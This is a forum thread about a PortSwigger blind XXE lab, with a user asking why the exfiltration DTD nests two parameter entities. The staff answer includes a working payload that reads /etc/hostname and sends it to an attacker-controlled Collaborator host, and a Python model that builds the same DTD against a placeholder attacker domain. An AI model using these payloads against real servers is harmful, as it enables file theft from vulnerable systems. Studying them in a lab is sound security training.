Burp Suite User Forum


Nested parameter Entities (XXE labs)

Nerio.Stracci | Last updated: Mar 08, 2022 07:52PM UTC

Hi, I have a question about the parameter entities used in the lab "Exploiting blind XXE to exfiltrate data using a malicious external DTD":

(1) <!ENTITY % file SYSTEM "file:///etc/hostname">
(2) <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/?x=%file;'>">
(3) %eval;
(4) %exfil;

I don't understand line (2): why should we use two parameter entities? Why not directly perform

<!ENTITY % exfil SYSTEM 'http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/?x=%file;'>

?

Hannah, PortSwigger Agent | Last updated: Mar 09, 2022 09:12AM UTC

Hi

This is explained in the learning material here.

This DTD carries out the following steps:
  • Defines an XML parameter entity called file, containing the contents of the /etc/passwd file.
  • Defines an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called exfiltrate. The exfiltrate entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the file entity within the URL query string.
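Why the SystemLiteral cannot simply contain %file;, shown as an added worked example (this is not PortSwigger's code and not a real XML parser, only a small Python model of the three XML 1.0 rules that matter here): parameter-entity references are recognized inside an EntityValue (the "..." of a declaration) but not inside a SystemLiteral (the '...' after SYSTEM), so a %file; written after SYSTEM is six literal characters; an EntityValue may not contain a bare % character, which is why the inner declaration writes &#x25;; and a top-level %eval; reference inserts eval's replacement text into the DTD, where it is parsed as markup and becomes a live declaration of exfil whose URL now carries the file contents. The attacker host attacker.example.net and the hostname value lab-host-01 are assumptions standing in for the Collaborator subdomain and the real /etc/hostname.

```python
import re

# Constructed stand-ins for the lab (assumptions of this example): the
# "filesystem" the vulnerable parser reads, and the attacker host that
# replaces YOUR-SUBDOMAIN-HERE.burpcollaborator.net.
RESOURCES = {"file:///etc/hostname": "lab-host-01"}
ATTACKER = "http://attacker.example.net"

# <!ENTITY % name "EntityValue">  or  <!ENTITY % name SYSTEM "SystemLiteral">
DECL_RE = re.compile(
    r'<!ENTITY\s+%\s+(?P<name>\w+)\s+(?:'
    r'"(?P<value>[^"]*)"'
    r'|SYSTEM\s+(?:"(?P<sys_dq>[^"]*)"|\'(?P<sys_sq>[^\']*)\')'
    r')\s*>'
)
PE_REF_RE = re.compile(r"%(\w+);")
# Tokens that matter inside an EntityValue: char refs, PE refs, or a bare '%'.
VALUE_TOKEN_RE = re.compile(r"&#x([0-9A-Fa-f]+);|&#([0-9]+);|%(\w+);|(%)")


class MiniDtd:
    """Processes just enough of an external DTD subset to show the trick."""

    def __init__(self, resources):
        self.resources = resources  # URI -> content the parser would read
        self.entities = {}          # name -> {"text": ...} or {"system": uri}
        self.fetched = []           # every URI dereferenced, in order

    def replacement(self, name):
        """Replacement text of a parameter entity; external ones are fetched."""
        ent = self.entities.get(name)
        if ent is None:
            raise ValueError(f"undeclared parameter entity %{name};")
        if "text" in ent:
            return ent["text"]
        self.fetched.append(ent["system"])
        # The request to the attacker host has already leaked the URL even if
        # nothing useful (or a 404) comes back, so an unknown URI yields "".
        return self.resources.get(ent["system"], "")

    def entity_value(self, literal):
        """XML 1.0 4.4.5: inside an EntityValue, character references are
        decoded and %name; references are expanded ("included in literal").
        The '%' produced by &#x25; is a plain character and is not rescanned."""
        def token(m):
            if m.group(1):
                return chr(int(m.group(1), 16))
            if m.group(2):
                return chr(int(m.group(2)))
            if m.group(3):
                return self.replacement(m.group(3))
            raise ValueError("bare '%' in EntityValue; write &#x25; instead")
        return VALUE_TOKEN_RE.sub(token, literal)

    def process(self, markup):
        pos = 0
        while pos < len(markup):
            if markup[pos].isspace():
                pos += 1
                continue
            m = DECL_RE.match(markup, pos)
            if m:
                name = m.group("name")
                if m.group("value") is not None:
                    self.entities[name] = {"text": self.entity_value(m.group("value"))}
                else:
                    # SystemLiteral is taken verbatim: a %file; inside it is
                    # not recognized as a reference (XML 1.0 2.8), so it stays
                    # as the six characters "%file;".
                    uri = m.group("sys_dq") if m.group("sys_dq") is not None else m.group("sys_sq")
                    self.entities[name] = {"system": uri}
                pos = m.end()
                continue
            m = PE_REF_RE.match(markup, pos)
            if m:
                # A top-level %name; is replaced by its replacement text, which
                # is then parsed as markup. This turns eval's text into a live
                # declaration of exfil.
                self.process(self.replacement(m.group(1)))
                pos = m.end()
                continue
            raise ValueError(f"unsupported markup at offset {pos}: {markup[pos:pos + 20]!r}")


def requests_made(dtd):
    """Run a DTD through the model and return the URIs it dereferenced."""
    parser = MiniDtd(RESOURCES)
    parser.process(dtd)
    return parser.fetched


# What the question proposes: %file; directly inside the SystemLiteral.
DIRECT_DTD = f"""
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % exfil SYSTEM '{ATTACKER}/?x=%file;'>
%exfil;
"""

# The lab's DTD: build the exfil declaration inside an EntityValue first.
NESTED_DTD = f"""
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '{ATTACKER}/?x=%file;'>">
%eval;
%exfil;
"""

if __name__ == "__main__":
    print("direct:", requests_made(DIRECT_DTD))
    print("nested:", requests_made(NESTED_DTD))
```

Running it shows the difference: the direct DTD never reads /etc/hostname at all and sends a request whose query string is the literal text ?x=%file;, while the nested DTD reads the file while eval's value is stored, then declares exfil with the file contents already in the URL, which is what the %exfil; request carries out to the attacker.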

Muhammad | Last updated: Sep 16, 2022 06:10AM UTC

Hannah, where is it mentioned?

Hannah, PortSwigger Agent | Last updated: Sep 16, 2022 08:37AM UTC

The linked learning material can be found here: https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-exfiltrate-data-out-of-band

Rahul | Last updated: Aug 27, 2023 08:12AM UTC

I have explained this in my tweet and attached a link to my answer on Security StackExchange. https://twitter.com/irahulmali/status/1687797075218403328
